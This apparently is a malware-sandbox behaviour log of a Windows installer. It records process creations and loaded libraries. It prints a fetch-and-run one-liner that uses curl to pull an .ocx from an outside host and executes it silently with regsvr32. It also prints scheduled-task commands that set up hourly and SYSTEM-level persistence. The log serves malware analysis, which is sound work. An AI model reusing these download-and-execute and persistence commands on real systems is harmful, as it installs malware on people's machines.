Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
Source: unknown | Process created: C:\Program Files\Surfclub\Install.exe "C:\Program Files\Surfclub\Install.exe" install https://qb-hos.pages.dev/page-2/?source_id=6
Source: C:\Program Files (x86)\Main\Chop\Install.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Main\Chop\Install.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\219880.ocx"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx"
Source: unknown | Process created: C:\Program Files\Surfclub\Install.exe "C:\Program Files\Surfclub\Install.exe" install https://qb-hos.pages.dev/page-2/?source_id=6
Source: C:\Users\user\Desktop\1.exe | Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="7448" CHAINERUIPROCESSID="7448Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741399570 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F574E926F0549E16F7448F5C9BE1C2BF C
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9539C2E5DC35A3081EC0BB575F66643E
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 208B5DB405716A1E55D335C3D35AEAD8 E Global\MSI0000
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f
Source: C:\Program Files (x86)\Main\Chop\Install.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\219880.ocx"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx"
Source: C:\Users\user\Desktop\1.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: msi.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: davhlpr.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: lpk.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: msihnd.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: tsappcmp.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: msisip.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\1.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: lpk.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msihnd.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
